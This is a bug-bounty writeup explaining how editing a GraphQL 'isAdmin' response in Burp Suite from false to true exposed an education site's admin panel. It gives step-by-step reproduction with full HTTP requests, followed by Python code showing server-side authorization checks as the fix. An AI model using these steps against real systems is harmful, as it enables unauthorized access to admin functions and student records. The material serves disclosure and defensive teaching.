Another Admin panel
2021-12-15 02:34:48 Author: infosecwriteups.com (view original) Reads: 16

Rizwan_siddiqui

As-Salaam-Alaikum.(Peace be upon you).

I am back with another writeup. I hope you guys are hunting and earning bounties. This time I was able to access an admin panel with the help of GraphQL. Let's start.

I am taking target.com as an example for this writeup. I was testing the subdomains of target.com one by one and I came to this subdomain: education.target.com. This is some kind of education page where students can log in and see the lectures.

Attack

When I logged in as a normal user I saw the page where the login function and the student education page are available. I opened Burp Suite and refreshed the page to see what requests were made to the server. After that I saw that a GraphQL request was made for some reason to an API endpoint.

Request

POST /api/graphql HTTP/1.1
Host: education.target.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/91.0
Accept: */*
Cookie: a0:state=YOUR Cookie

{"operationName":"isAdmin","variables":{},"query":"query isAdmin {\n isAdmin\n}\n"}

I right-clicked on that request -> Do intercept -> Response to this request in Burp Suite.

Response

HTTP/1.1 200 OK
Server: nginx/1.19.1
Date: Sat, 04 Sep 2021 04:47:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 27
Connection: close
access-control-allow-origin: *
access-control-allow-credentials: true
etag: W/"1b-fPOq3WJkZQ0rkaalpPwLwZziKSQ"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15724800; includeSubDomains

{"data":{"isAdmin":false}}  <-- I just changed this to "isAdmin":true

And I was able to access the admin panel. There I could add lectures and see the list of all students.

  1. Go to this URL: education.target.com
  2. Log in with your credentials.
  3. After that, refresh the page and capture the request in Burp Suite. Forward every request until you see this request:

POST /api/graphql HTTP/1.1
Host: education.target.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/91.0
Accept: */*
Cookie: a0:state=YOUR Cookie

{"operationName":"isAdmin","variables":{},"query":"query isAdmin {\n isAdmin\n}\n"}

  4. Right-click on that request -> Do intercept -> Response to this request

  5. After that you will see this response in your Burp Suite:

HTTP/1.1 200 OK
Server: nginx/1.19.1
Date: Sat, 04 Sep 2021 04:47:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 27
Connection: close
access-control-allow-origin: *
access-control-allow-credentials: true
etag: W/"1b-fPOq3WJkZQ0rkaalpPwLwZziKSQ"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15724800; includeSubDomains

{"data":{"isAdmin":false}}

  6. Change "isAdmin":false to "isAdmin":true and send that request.

  7. Go back to your browser. You will see the admin panel on your home page.

The main vulnerability lies in the GraphQL implementation. Just because of a misconfiguration in that implementation, an attacker was able to access the admin panel.

Always check each and every request on the login page, especially the GraphQL requests.
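The steps above and the summary that follows show the same pattern: the browser decides whether to render the admin panel from the server's isAdmin answer, so an edited response makes the panel appear, and the admin functions behind it (adding lectures, listing students) must therefore be protected on the server rather than by the panel being hidden. The following is an added example, not code from the writeup or from the target's API: a minimal Python stand-in for a /api/graphql handler with constructed sessions and data, hypothetical operation names (addLecture, allStudents) alongside the page's isAdmin, a simulated proxy edit of the isAdmin response, and an `enforce` switch that reproduces the vulnerable behaviour versus the fixed one.

```python
import json


class AuthError(Exception):
    """Raised by a resolver when the session lacks the role it requires."""


# Constructed session store: cookie value -> server-side identity. In the real
# service this would be whatever the a0:state cookie resolves to.
SESSIONS = {
    "student-cookie": {"user": "alice", "role": "student"},
    "admin-cookie": {"user": "root", "role": "admin"},
}
STUDENTS = ["alice", "bob"]  # constructed data
LECTURES = []                # constructed data


def require_admin(session, enforce):
    """Server-side authorization check. enforce=False reproduces the writeup's
    vulnerable behaviour: admin operations rely on the UI having hidden the
    admin panel from non-admins instead of checking the session role."""
    if enforce and session["role"] != "admin":
        raise AuthError("not authorized")


def resolve_is_admin(session, variables, enforce):
    # Advisory answer for the UI: a rendering hint for the client, never a guard.
    return session["role"] == "admin"


def resolve_add_lecture(session, variables, enforce):
    require_admin(session, enforce)
    LECTURES.append(variables["title"])
    return {"title": variables["title"]}


def resolve_all_students(session, variables, enforce):
    require_admin(session, enforce)
    return list(STUDENTS)


# operationName -> (top-level field, resolver). Names are hypothetical.
RESOLVERS = {
    "isAdmin": ("isAdmin", resolve_is_admin),
    "addLecture": ("addLecture", resolve_add_lecture),
    "allStudents": ("allStudents", resolve_all_students),
}


def handle_graphql(cookie, body, enforce=True):
    """Serve one POST /api/graphql body (a JSON string) for the session
    identified by cookie. Returns a GraphQL-style response dict."""
    session = SESSIONS.get(cookie)
    if session is None:
        return {"data": None, "errors": [{"message": "unauthenticated"}]}
    req = json.loads(body)
    op = req.get("operationName")
    if op not in RESOLVERS:
        return {"data": None, "errors": [{"message": "unknown operation %r" % op}]}
    field, resolver = RESOLVERS[op]
    try:
        return {"data": {field: resolver(session, req.get("variables") or {}, enforce)}}
    except AuthError as exc:
        return {"data": {field: None}, "errors": [{"message": str(exc)}]}


def tamper_is_admin(raw_response):
    """Simulate the proxy edit from the writeup: rewrite the isAdmin answer on
    the wire from false to true. Only the browser's belief changes."""
    resp = json.loads(raw_response)
    resp["data"]["isAdmin"] = True
    return json.dumps(resp, separators=(",", ":"))


def render_client(cookie, tamper=False, enforce=True):
    """Simulated single-page app: asks isAdmin, shows the admin panel if the
    answer is true, then calls the admin operations the panel exposes.
    Returns what the user actually achieved, not what the panel displayed."""
    query = json.dumps({"operationName": "isAdmin", "variables": {},
                        "query": "query isAdmin {\n isAdmin\n}\n"})
    raw = json.dumps(handle_graphql(cookie, query, enforce), separators=(",", ":"))
    if tamper:
        raw = tamper_is_admin(raw)
    outcome = {"panel_rendered": json.loads(raw)["data"]["isAdmin"] is True,
               "lecture_added": False, "students": None}
    if not outcome["panel_rendered"]:
        return outcome
    add = handle_graphql(cookie, json.dumps({
        "operationName": "addLecture", "variables": {"title": "Week 1"},
        "query": "mutation addLecture($title: String!) {\n addLecture(title: $title) { title }\n}\n"}), enforce)
    outcome["lecture_added"] = "errors" not in add
    listing = handle_graphql(cookie, json.dumps({
        "operationName": "allStudents", "variables": {},
        "query": "query allStudents {\n allStudents\n}\n"}), enforce)
    outcome["students"] = listing["data"]["allStudents"]
    return outcome


if __name__ == "__main__":
    print("vulnerable, tampered:", render_client("student-cookie", tamper=True, enforce=False))
    print("fixed, tampered:    ", render_client("student-cookie", tamper=True))
    print("fixed, real admin:  ", render_client("admin-cookie"))
```

With `enforce=False` the tampered student session renders the panel and the admin operations succeed, which is the outcome the writeup reports. With the checks in the resolvers the panel still renders (the client can always be lied to about isAdmin), but addLecture returns an error and allStudents returns nothing, so the tampering buys the attacker only an empty page. A quick regression test for a defender is to send the admin operations directly with a non-admin session and assert that each one is refused, regardless of what isAdmin says.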

I am not attaching a screenshot of the admin panel page because of company privacy.


Source: https://infosecwriteups.com/another-admin-panel-e0489dc76678?source=rss----7b722bfd1b8d--bug_bounty